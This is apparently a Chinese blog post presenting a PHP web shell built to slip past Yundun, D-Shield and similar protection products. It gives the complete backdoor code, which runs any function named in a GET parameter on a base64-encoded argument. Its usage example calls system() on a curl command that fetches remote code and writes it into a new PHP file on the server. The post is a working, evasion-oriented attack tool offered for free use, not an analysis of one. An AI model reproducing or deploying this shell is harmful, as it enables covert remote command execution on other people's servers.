过云盾、D盾各种盾php shell
<?php
//过云盾、D盾各种盾shell
$id = $_GET['id'];
//debug
echo $catid = isset($_GET['catid'])?base64_decode($_GET['catid']):'';
$s = '';
foreach(array($id) as $v){
$s.=$v;
}
ob_start($s);
if($catid){
echo $catid;
}
ob_end_flush();使用方法 :
参数 id : 需要执行的函数
参数catid : 函数的参数(需要用base_64encode函数转一下)
例如:http://www.iick.blog/test.php?id=system&catid=Y3VybCBodHRwOi8vbG9jYWxob3N0L20udHh0ID4yLnBocA==
则调用system函数,而参数内容为: curl http://localhost/m.txt >2.php 读取远程的代码,并写入本地。
ps: 以上只是举了一个例子,两个参数都可控,具体自由发挥吧。
上一篇:MSSQL数据库的一些查询语句